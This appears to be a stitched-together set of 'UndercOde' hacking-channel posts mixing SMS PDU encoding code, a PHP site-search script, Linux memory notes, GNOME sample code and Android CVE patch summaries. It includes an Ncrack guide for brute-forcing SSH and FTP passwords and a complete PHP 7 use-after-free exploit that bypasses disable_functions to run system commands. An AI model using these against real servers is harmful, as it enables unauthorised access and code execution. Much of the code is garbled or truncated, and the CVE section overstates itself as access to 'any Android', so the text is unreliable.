▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 lets share now some mobile development code: FULL PART 1 :

>At present, the application of mobile phone short messages is becoming more and more widespread. There are more and more sites, but the services of some sites are not satisfactory, and often send short messages to the sea.
twitter.com/UndercOdeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

>by sendind sms

1) Data lines connected to
first, connected by S35 / 25 data lines mobile phone and computer serial ports. Then, open the HyperTerminal and select the direct serial port connection. The port parameters are set to 19200 rate, no parity, data bit 8, stop bit 1.

2) Infrared connection
computer if used with an infrared port, you can set the phone's wireless connection. First make sure that the computer's infrared port is turned on, and turn on the infrared and fax / data functions of the mobile phone. To connect to the infrared port, an infrared device Siemens S35 should appear on the computer system tray (if no infrared monitor is installed, it will not be displayed). Then, open HyperTerminal and select the serial port on IrDa.

3) Connection Test
Click HyperTerminal call button on the toolbar, type AT and press Enter, OK appears on the screen if you're connected computer and cell phone, then you can enter the various types of GSM AT commands.
For example: query the mobile phone manufacturer, enter AT ＋ CGMI = <CR>, the screen displays Siemens.
Under normal circumstances, execute the test command AT ＋ CMGS =? <CR>. If it returns OK, the mobile phone supports this command. The complete syntax format of this instruction is as follows:
If PDU mode (+ CMGF = 0) + CMGS = <length> <CR> PDU is given <ctrl-Z / ESC>

4) If the short message format instruction AT + CMGF returns 0, the SMS format is PDU Mode, and then execute the AT + CMGS = <data length> command, the phone returns to the ">" symbol and waits for input. Enter the PDU data and end with ^ Z or Esc.

5) If the message is sent successfully, it returns OK, and the message number is displayed:
+ CMGS: <mr>

6) If the message fails to be sent, the following message is returned:

> Data analysis PDU format
below to go through the analysis of information stored in the phone, and to introduce SMS PDU data format. First, write a short message with your mobile phone, and send the mobile phone number 13605690631, and the content of the message is "Hello World!". This information can be read out by executing AT + CMGL = 2.

7) The operation process is as follows (italic characters are response messages, {} are comments):
AT
OK
AT ＋ CMGL = 2 {read
unsent short messages} + CMGL: 1,2,, 24 {1 indicates the number of messages, 2 indicates no messages, 24 indicates the total capacity of the message}
08 91 683108501505F0 11 00 0B 81 3106656930F1 0000A7 0B E8329BFD06DDDF723619
OK　

7) This information is analyzed below:
08: short message center address length.
91: short message center number type, 91 is TON / NPI. TON / NPI complies with the International / E.164 standard, which means a '+' sign must be added before the number; other values ​​are also possible, but 91 is the most commonly used.
683108501505F0: The short message number is the address of the service center used. Due to slight processing on the location, the actual number should be: 8613805515500 (the letter F means the length minus 1), which is the number of the GSM short message center where the author is located.

8) 11: file header byte (header byte, is a bitmask). Here 11 refers to sending short messages normally.
00: Information type.
0B: called number length.
81: called number type.
3106656930F1: The called number has also been shifted. The actual number is 13605696031.
0000A7: GSM Default Alphabet, or 000010 for Chinese.
0B: short message length.
E8329BFD06DDDF723619: The content of the short message "Hello World!"
12) Coding and programming SMS implementation
Here we introduce the method to encode information in plain English and Chinese are pure.

Through testing, we found that the front part of each short message sent was the same, except that the called number and the content of the short message changed.

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑lets share now some mobile development code Part 2 final :
pinterest.com/UndercOdeOfficial


1) let s set short message content is "Hello World!" via sms. The default GSM character set is a 7-bit encoding, which can be simply understood as ASCII (the ASCII value is less than 80Hex, so Bit8 is ignored). The last few digits of the next 7-bit encoding are sequentially moved to the front one by one to form a new 8-bit code, see Table 2 for arrow indication. It should be noted that in the ninth line, the shift count has reached 7 bits, then directly add 0 before this encoding. GSM does not support all ASCII character displays.

2) Here is the English coding portion codes Delphi 5:
// English format encoding, s is a String
function Encode1 (var S: String): String;
var
I, J, len: Integer;
CUR: Integer ;
t: String;
begin
Result: = '';
len: = Length (s);
// j is used to shift the count
i: = 1; j: = 0;
while i <= len do
begin
if i <len then
// data transformation
cur: = (ord (s [i]) shr j) or ( (ord (s [i + 1]) shl (7-j)) and ＄ ff)
else
cur: = (ord (s [i]) shr j) and ＄ 7f;
FmtStr (t, '% 2.2X', [cur ]);
Result: = Result ＋ t;
inc (i);
// Special processing for shift count up to 7 bits
j: = (j + 1) mod 7; if j = 0 then inc (i);
end;
end;　　

3) some coding lines because mostly devices coding in chinia:

> set short message content is "Chinese short message." The realization of Chinese short message is relatively simple, just need to convert the Chinese encoding of ?????? into the Unicode encoding of code page CP936.

> Chinese encoding process implemented

by the @UndercodeTesting type conversion, cleverly realized ?????? Unicode code conversion (Note that the code page and associated operating system) to. Here are some Delphi 5 codes that implement Chinese encoding:
// Chinese format encoding, s is Unicode String
function Encode2 (var s: WideString): String;
var
i, len: Integer;
cur: Integer;
t: String;
begin
Result: = '';
len: = Length (s);
i: = 1;
while i <= len do
begin
cur: = ord (s [i] );
// convert the BCD
FmtStr (T, '% 4.4x', [CUR]);
the Result: the Result = T +;
inc is (I);
End;
End;


4) above described encoding PDU format short message. It is recommended that the length of the English message does not exceed 140 characters, and the Chinese message does not exceed 54 Chinese characters. If you use a mobile phone that supports text mode for sending, it is easier to implement. To send "Hello World!", Use the following AT command:

> AT ＋ CGMF = 1 <CR> AT ＋ CGMS = "136056960

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑HOW BUILD YOUR OWN SEARCH ENGINE BY UNDERCODE ? FULL
T.me/UndercodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

> Before you write a program, you must think of an idea. The following is my idea. Maybe anyone has a better idea, but note that this is just a method issue: iterate through all files? Read content? Search keywords, if it matches, put it into an array ? Reading group. Before implementing these steps, I assume that your web pages are standard, that is, there are titles (<title> </ title>) and (<bod *> </ body>), if you are designing with dreamweaver or frontpage , Then unless you deliberately delete them, they all exist. Let's step by step to complete and improve this search engine in the project.

1) First, the design search form
to build a search.htm in the root directory of your site, as follows
<HTML>
<head>
<title> Search Form </ title>
<Meta HTTP-equiv = "Content-Type" Content = "text / html; charset = gb2312 ">
</ head>

<body bgcolor =" # FFFFFF "text =" # 000000 ">
<form name =" form1 "method ="

<tr>
<td width = "36%">
<div align = "center">
<input type = "text" name = "keyword">
</ div>
</ td>
<td width = "64%">
<input type = "submit" name = "Submit" value = "Search">
</ td>
</ tr>
</ table>
</ form>
</ body>
</ html>


2) Second, the search program
is in the root directory Create a search.php file to process the data from the search.htm form. The content is as follows:
<? Php
// Get the search keyword
$ keyword = trim ( $ _POST [ “keyword” ]);
// Check if it is empty
if ( $ keyword == ”” ) {
echo “The keyword you are searching for cannot be empty” ;
exit; // End the program
}
?>

3) This way, if the keyword entered by the visitor is empty, a prompt can be made. Here is iterating through all the files.

4) We can iterate through all the files recursively, using the functions opendir, readdir, or PHP Directory classes. We now use the former.
<PHP?
// function to traverse all files
function listFiles ( $ dir ) {
$ handle = opendir ( $ dir );
the while ( false ! == ( $ File = readdir ( $ handle ))) {
IF ( $ file ! = "." && $ file ! = ".." ) {
// Continue searching
if it is a directory if ( is_dir ( "$ dir / $ file" )) {
listFiles ( "$ dir / $ file" );
}
else {
// Process it here
}
}
}
}

?>

5) In the red text place, we can read and process the searched file. The following is the content of the read file And check whether the content contains the keyword $ keyword, if it contains, the file address is assigned to an array.
<? php
// $ dir is the search directory, $ keyword is the search keyword, and $ array is the stored array
function listFiles ( $ dir , $ keyword , & $ array ) (
$ handle = opendir ( $ dir );
while ( false ! == ( $ file = readdir ( $ handle ))) {
if ( $ file! = "." && $ file ! = ".." ) {
if ( is_dir ( "$ dir / $ file" )) {
listFiles ( "$ dir / $ file" , $ keyword , $ array );
}
else {
// read file contents
$ data = fread ( fopen ( "$ dir / $ file" , "r" ), filesize ( "$ dir / $ file" ));
// do not search itself
if ( $ file ! = ” search .php ” ) {
// Whether to match
if (Now combine this result with the program at the beginning, enter a keyword, and you will find that relevant results in your website are searched out. We are perfecting it now.
Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Top cracking tool how use Ncrack tool :
http://pinterest.com/UndercOdeOfficial

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

Ncrack is used frequently in hacking FTP and SSH servers. Hackers love this because this is much faster and accurate than Hydra.


How to:

(clone https://github.com/nmap/ncrack)


1) This is the key command of using Ncrack in cracking SSH passwords:
ncrack -p 22 --user admin -P pass.txt 192.168.1.1 -vv

2) -p 22 is the port of your target. Since we are targeting the SSH of the target then we write 22 because SSH = port 22 in most cases.

3) user admin is used because we already know that the username of our target as example...

4) -P pass.txt is used because we don’t know yet the password (of course!) and this is where we put our wordlist

5)192.168.1.1 is where you put the IP address of your target 6. -vv is used just to verbose what is doing by the tool in the background while finding the password

6) If you are trying this to hack FTP then just change the port 22 to 21 because FTP is using port 21 in most cases.

7) well done!

@UndercOdeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 2020 bug from few days- PHP 7.0 < 7.4 (Unix) debug_backtrace disable_functions Bypass

<?php

$cmd = "id";

$n_alloc = 10; # increase this value if you get segfaults

class MySplFixedArray extends SplFixedArray {
public static $leak;
}

class Z implements JsonSerializable {
public function write(&$str, $p, $v, $n = 8) {
$i = 0;
for($i = 0; $i < $n; $i++) {
$str[$p + $i] = chr($v & 0xff);
$v >>= 8;
}
}

public function str2ptr(&$str, $p = 0, $s = 8) {
$address = 0;
for($j = $s-1; $j >= 0; $j--) {
$address <<= 8;
$address |= ord($str[$p+$j]);
}
return $address;
}

public function ptr2str($ptr, $m = 8) {
$out = "";
for ($i=0; $i < $m; $i++) {
$out .= chr($ptr & 0xff);
$ptr >>= 8;
}
return $out;
}

# unable to leak ro segments
public function leak1($addr) {
global $spl1;

$this->write($this->abc, 8, $addr - 0x10);
return strlen(get_class($spl1));
}

# the real deal
public function leak2($addr, $p = 0, $s = 8) {
global $spl1, $fake_tbl_off;

# fake reference zval
$this->write($this->abc, $fake_tbl_off + 0x10, 0xdeadbeef); # gc_refcounted
$this->write($this->abc, $fake_tbl_off + 0x18, $addr + $p - 0x10); # zval
$this->write($this->abc, $fake_tbl_off + 0x20, 6); # type (string)

$leak = strlen($spl1::$leak);
if($s != 8) { $leak %= 2 << ($s * 8) - 1; }

return $leak;
}

public function parse_elf($base) {
$e_type = $this->leak2($base, 0x10, 2);

$e_phoff = $this->leak2($base, 0x20);
$e_phentsize = $this->leak2($base, 0x36, 2);
$e_phnum = $this->leak2($base, 0x38, 2);

for($i = 0; $i < $e_phnum; $i++) {
$header = $base + $e_phoff + $i * $e_phentsize;
$p_type = $this->leak2($header, 0, 4);
$p_flags = $this->leak2($header, 4, 4);
$p_vaddr = $this->leak2($header, 0x10);
$p_memsz = $this->leak2($header, 0x28);

if($p_type == 0x6474e552) { # PT_GNU_RELRO
# handle pie
$data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr;
$data_size = $p_memsz;
} else if($p_type == 1 && $p_flags == 5) { # PT_LOAD, PF_Read_exec
$text_size = $p_memsz;
}
}

if(!$data_addr || !$text_size || !$data_size)
return false;

return [$data_addr, $text_size, $data_size];
}

public function get_basic_funcs($base, $elf) {
list($data_addr, $text_size, $data_size) = $elf;
for($i = 0; $i < $data_size / 8; $i++) {
$leak = $this->leak2($data_addr, $i * 8);
if($leak - $base > 0 && $leak - $base < $text_size) {
$deref = $this->leak2($leak);
# 'constant' constant check
if($deref != 0x746e6174736e6f63)
continue;
} else continue;

$leak = $this->leak2($data_addr, ($i + 4) * 8);
if($leak - $base > 0 && $leak - $base < $text_size) {
$deref = $this->leak2($leak);
# 'bin2hex' constant check
if($deref != 0x786568326e6962)
continue;
} else continue;

return $data_addr + $i * 8;
}
}

public function get_binary_base($binary_leak) {
$base = 0;
$start = $binary_leak & 0xfffffffffffff000;
for($i = 0; $i < 0x1000; $i++) {
$addr = $start - 0x1000 * $i;
$leak = $this->leak2($addr, 0, 7);
if($leak == 0x10102464c457f) { # ELF header
return $addr;
}
}
}

public function get_system($basic_funcs) {
$addr = $basic_funcs;
do {
$f_entry = $this->leak2($addr);
$f_name = $this->leak2($f_entry, 0, 6);
if($f_name == 0x6d6574737973) { # system

return $this->leak2($addr + 8);
}
$addr += 0x20;
} while($f_entry != 0);
return false;
}

public function jsonSerialize() {
global $y, $cmd, $spl1, $fake_tbl_off, $n_alloc;

$contiguous = [];
for($i = 0; $i < $n_alloc; $i++)
$contiguous[] = new DateInterval('PT1S');

$room = [];
for($i = 0; $i < $n_alloc; $i++)
$room[] = new Z();

$_protector = $this->ptr2str(0, 78);

$this->abc = $this->ptr2str(0, 79);
$p = new DateInterval('PT1S');

unset($y[0]);
unset($p);

$protector = ".$_protector";

$x = new DateInterval('PT1S');
$x->d = 0x2000;
$x->h = 0xdeadbeef;
# $this->abc is now of size 0x2000

if($this->str2ptr($this->abc) != 0xdeadbeef) {
die('UAF failed.');
}

$spl1 = new MySplFixedArray();
$spl2 = new MySplFixedArray();

# some leaks
$class_entry = $this->str2ptr($this->abc, 0x120);
$handlers = $this->str2ptr($this->abc, 0x128);
$php_heap = $this->str2ptr($this->abc, 0x1a8);
$abc_addr = $php_heap - 0x218;

# create a fake class_entry
$fake_obj = $abc_addr;
$this->write($this->abc, 0, 2); # type
$this->write($this->abc, 0x120, $abc_addr); # fake class_entry

# copy some of class_entry definition
for($i = 0; $i < 16; $i++) {
$this->write($this->abc, 0x10 + $i * 8,
$this->leak1($class_entry + 0x10 + $i * 8));
}

# fake static members table
$fake_tbl_off = 0x70 * 4 - 16;
$this->write($this->abc, 0x30, $abc_addr + $fake_tbl_off);
$this->write($this->abc, 0x38, $abc_addr + $fake_tbl_off);

# fake zval_reference
$this->write($this->abc, $fake_tbl_off, $abc_addr + $fake_tbl_off + 0x10); # zval
$this->write($this->abc, $fake_tbl_off + 8, 10); # zval type (reference)

# look for binary base
$binary_leak = $this->leak2($handlers + 0x10);
if(!($base = $this->get_binary_base($binary_leak))) {
die("Couldn't determine binary base address");
}

# parse elf header
if(!($elf = $this->parse_elf($base))) {
die("Couldn't parse ELF");
}

# get basic_functions address
if(!($basic_funcs = $this->get_basic_funcs($base, $elf))) {
die("Couldn't get basic_functions address");
}

# find system entry
if(!($zif_system = $this->get_system($basic_funcs))) {
die("Couldn't get zif_system address");
}

# copy hashtable offsetGet bucket
$fake_bkt_off = 0x70 * 5 - 16;

$function_data = $this->str2ptr($this->abc, 0x50);
for($i = 0; $i < 4; $i++) {
$this->write($this->abc, $fake_bkt_off + $i * 8,
$this->leak2($function_data + 0x40 * 4, $i * 8));
}

# create a fake bucket
$fake_bkt_addr = $abc_addr + $fake_bkt_off;
$this->write($this->abc, 0x50, $fake_bkt_addr);
for($i = 0; $i < 3; $i++) {
$this->write($this->abc, 0x58 + $i * 4, 1, 4);
}

# copy bucket zval
$function_zval = $this->str2ptr($this->abc, $fake_bkt_off);
for($i = 0; $i < 12; $i++) {
$this->write($this->abc, $fake_bkt_off + 0x70 + $i * 8,
$this->leak2($function_zval, $i * 8));
}

# pwn
$this->write($this->abc, $fake_bkt_off + 0x70 + 0x30, $zif_system);
$this->write($this->abc, $fake_bkt_off, $fake_bkt_addr + 0x70);

$spl1->offsetGet($cmd);

exit();
}
}

$y = [new Z()];
json_encode([&$y]);

@UndercOdeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑what can do ? (the posted linux exploite code LINUX EXPLOITE) :

> This exploit uses a bug in debug_backtrace() function.

> We can trick it into returning a reference to a variable that has been destroyed, causing a use-after-free vulnerability.

> The PoC was tested on various php builds for Debian/Ubuntu/CentOS/FreeBSD with cli/fpm/apache2 server APIs and found to work reliably.
(already patched in Under code os )

@UndercOdeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

So results For android CVe 👌👍Nice choises

LET S STARTS

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Two ways Linux processes allocate memory-brk () and mmap ()
How can I see the number of page faults in a process?
twitter.com/UnderCodeTC

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

> Use ps -o majflt, minflt -C program command to view.
>majflt stands for major fault, the Chinese name is major fault, minflt stands for minor fault, and the Chinese name is minor fault.
> These two values represent the number of page faults that have occurred since a process was started.
🦑 What operations were performed after a page fault was issued?

When a process has a page fault interrupt, the process will fall into kernel mode and perform the following operations:

1) Check if the virtual address to be accessed is valid

2) Find / allocate a physical page

3) Fill the physical page content (read the disk, or Set it directly to 0, or do nothing)

4) Establish the mapping relationship (virtual address to physical address) and
re-execute the instruction that caused a page fault.

5) If the third step requires reading the disk, the page fault is majflt. , Otherwise it is minflt.

🦑 The principle of memory allocation:

>From the operating system perspective, there are two ways for a process to allocate memory, which are completed by two system calls: brk and mmap (without considering shared memory).

1) brk is to push the highest address pointer _edata of the data segment (.data) to the higher address;

2) mmap is to find a piece of free virtual memory in the virtual address space of the process (between the heap and the stack, called the file mapping area).

> Both methods allocate virtual memory, and do not allocate physical memory. When the allocated virtual address space is accessed for the first time, a page fault occurs, and the operating system is responsible for allocating physical memory, and then establishing a mapping relationship between virtual memory and physical memory.

> In the standard C library, malloc / free functions are provided to allocate and free memory. The bottom layer of these two functions is implemented by brk, mmap, and munmap system calls.

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Non-technical-Controlling Linux with Language: Linux's Speech Recognition Software Full by UndercOde
pinterest.com/UndercOdeOfficial

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Linux ViaVoice requires the machine's configuration: a 16-bit sound card. In fact, ViaVoice is designed and developed specifically for Red Hat, but users can run ViaVoice normally in the Red Hat, environment and other Linux versions. Of course, users may also encounter some problems during the installation process.

2) Before installing ViaVoice speech recognition software, you must first install the Java runtime environment. ViaVoice versions were tested in a JRE-1.2.2 environment. Using the correct-old stable version can avoid incompatibilities in different JRE environments.

3) After the JRE installation is complete, put the installation disk into the CD-ROM drive and run vvsetup in the root directory, and then run vvstartuser to set yourself as a ViaVoice user and set the appropriate volume. Finally, practice repeatedly to make the software adapt to your voice. Remember that the order of installation must never be reversed.

4) "Tuning" ViaVoice is
like other speech recognition software. ViaVoice, installed for the first time, cannot recognize the user's voice very accurately. The user must "tune" it before it can recognize the user's voice.

5) One way to “tweak” ViaVoice is to repeat the words in the user manual repeatedly. For most users, this is not difficult, but the words in the manual may not be used often by users, so this method is not very efficient.

6) A better method is to use ViaVoice's Dictation application software at work. It is written in Java. When the user dictates, some words may not be recognized correctly. When this happens, the user can modify it using the appropriate tools in Dictation. ViaVoice can then modify the recognition tool to more accurately identify the user's voice. This method may take more effort, but similar modifications can be done with voice commands. However, please keep it in mind as Dictation is not very stable.

7) An expert once said that the current speech recognition software can reach a 98% accuracy rate after only 10 to 60 hours of "tuning". But so far, the results of testing ViaVoice in the Linux environment are that it is only 92% to 95% accurate, and most voice commands can be correctly recognized. Even if the user spends only a few hours practicing, you can find that the accuracy of ViaVoice is significantly improved. However, users should pay special attention when using it, the pronunciation of words, the quality of the microphone and the surrounding environment will affect the accuracy of speech recognition.

8) viva voice official site http://www.vivavocesrs.com/

9) XVoice Controls Linux Desktop
> After users have completed the installation and training of ViaVoice, they can install Xvoice. Xvoice's role is to control the desktop system and application software. ViaVoice does not have these features. Users can go to xvoice.sourceforge.net to download the Xvoice software. Note that you must install the RPM in advance, because the source program requires ViaVoice in the Linux SDK to be interrupted.

10) After the installation is complete, enter xvoice m in the last window that appears, taking care not to run Dictation. At this point, the user can do a simple test, dictate the command "next window", and another window should appear on the desktop.

11) Xvoice allows users to pre-set some spoken commands for operations. A set of spoken commands is called a grammar group. Syntax groups can be associated with a specific application, window, or a module in an application, or they can be generated by context. Operations invoked by dictated commands can include keyboard strokes, mouse events, running external commands, or any combination of the three.

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Leverage GNOME Libraries to make writing applications easier
http://pinterest.com/UndercOdeOfficial

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

> This application has a menu menu and a detachable sub-menu, as well as a status bar that displays menu prompts, and automatically stores user-defined accelerator keys (hot keys). There is a standard "" About "" box In addition, all menu standard items have the ability to automatically switch languages ​​(try "" LANG = zh_TW.Big5 ./hello_world "", you will see a menu of Chinese characters).



/ * Hello World (Gnome Edition)
* Listing 1
* This code is public domain, so use it as you please.



* libraries that gnome needs, such as gtk, imlib, etc ...*/
#include

/* this is usually defined by autoconf but were just using simple makefiles */
#define VERSION ""1.0""

/* ""callback"" function (signal handler) which will quit the application*/
static void
exit_hello(GtkWidget *widget, gpointer data)
{
gtk_main_quit ();
}

/* callback function for when the window closes */
static int
delete_event(GtkWidget *widget, gpointer data)
{
gtk_main_quit ();
return FALSE; /* false means continue with closing the window */
}

/* a callback for the about menu item, it will display a simple ""About""
* dialog box standard to all gnome applications
*/
void
about_hello(GtkWidget *widget, gpointer data)
{
GtkWidget *box;
const char *authors[] = {
""James Bond"",
NULL
};

box = gnome_about_new(/*title: */ ""Hello World (Gnome Edition)"",
/*version: */VERSION,
/*copyright: */ ""(C) 1999 Secret Agents Inc."",
/*authors: */authors,
/*other comments: */
""An extremely complicated application which ""
""does absolutely nothing useful"",
NULL);
gtk_widget_show(box);
}

/* define the menus here */

static GnomeUIInfo file_menu [] = {
/* some item which is not one of the standard ones, the null
* would be the callback, however we dont want to really do anything */
GNOMEUIINFO_ITEM_NONE(""Something"",""Just an item which does nothing"",NULL),
/* standard exit item */
GNOMEUIINFO_MENU_EXIT_ITEM(exit_hello,NULL),
GNOMEUIINFO_END
};

static GnomeUIInfo help_menu [] = {
/* load the helpfiles for this application if available */
GNOMEUIINFO_HELP(""hello_world""),
/* the standard about item */
GNOMEUIINFO_MENU_ABOUT_ITEM(about_hello,NULL),
GNOMEUIINFO_END
};

/* define the main menubar */
static GnomeUIInfo main_menu [] = {
GNOMEUIINFO_MENU_FILE_TREE(file_menu),
GNOMEUIINFO_MENU_HELP_TREE(help_menu),
GNOMEUIINFO_END
};

🦑then /* Our main function */
int
main(int argc, char *argv[])
{
GtkWidget *app; /* pointer to our main window */
GtkWidget *w; /* pointer to some widget */

/* initialize gnome */
......

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Termux-Webpentest... tool
> txtool is made to help you for easly pentesting in termux,
t.me/UndercOdeTesting

1) git clone https://github.com/kuburan/txtool.git

2) cd txtool

3) apt install python2

4) ./install.py

5) Mtxtool

@UndercOdeTesting

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁


🦑2020 all Android Cve - VULNERABILITIES TO GAIN ACCESS ON ANY ANDROID :
twitter.com/UndercOdeTC

> CVE References Type Severity Updated AOSP versions

1) CVE-2020-0014 A-128674520 EoP High 8.0, 8.1, 9, 10

2) CVE-2020-0015 A-139017101 EoP High 8.0, 8.1, 9, 10

3) CVE-2019-2200 A-67319274 EoP High 10

4) CVE-2020-0017 A-123232892 [2] ID High 8.0, 8.1, 9, 10

5) CVE-2020-0018 A-139945049 ID High 8.0, 8.1, 9, 10

6) CVE-2020-0020 A-143118731 ID High 10

7) CVE-2020-0021 A-141413692 [2] [3] DoS High 10

@UndercOdeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Let s Start with First Android Vulnerabilitie :
instagram.com/UndercOdeTestingCompany

🦑 CVE-2020-0014 A-128674520 EoP High 8.0, 8.1, 9, 10 :

1) RESTRICT AUTOMERGE
Make toasts non-clickable

2) Since enforcement was only on client-side, in Toast class, an app could

3) use reflection (or other means) to make the Toast clickable. This is a
security vulnerability since it allows tapjacking, that is, intercept touch
events and do stuff like steal PINs and passwords.

🦑This CL brings the enforcement to the system by applying flag
FLAG_NOT_TOUCHABLE.

Test: atest CtsWindowManagerDeviceTestCases:ToastTest
Test: Construct app that uses reflection to remove flag FLAG_NOT_TOUCHABLE and
log click events. Then:

1) Observe click events are logged without this CL.

2) Observer click events are not logged with this CL.

Bug: 128674520

Change-Id: Ic36585bc4f186e0224f5b687c49c0b3d9266838c
(cherry picked from commit b81f269ae2afb446b9d4a909fc2bcf038af00c41)

@UndercOdeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 CVE-2020-0015 A-139017101 EoP High 8.0, 8.1, 9, 10
Android bug details :
instagram.com/UndercOdeTestingCompany

1) KeyChain: Do not allow hiding Cert Install dialog

2) Do not allow apps to float a window on top of the certificate
installation / naming dialog.

3) This obscures the CA certificate installation dialog and could be used
to trick a user into installing a CA certificate.

4) This is fixed by adding the HIDE_NON_SYSTEM_OVERLAY_WINDOWS system
flag when the activity is created (onCreate), so that another activity
starting in the foreground would not be able to obscure the dialog.

Bug: 139017101
Test: Manual, with an app that floats a window.
Change-Id: Iff8e678743c3883cf1f7f64390097a768ca00856
(cherry picked from commit afdacb2ec4c5cdc2fb2a9943fa5b48100f4725c8)


@UndercOdeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁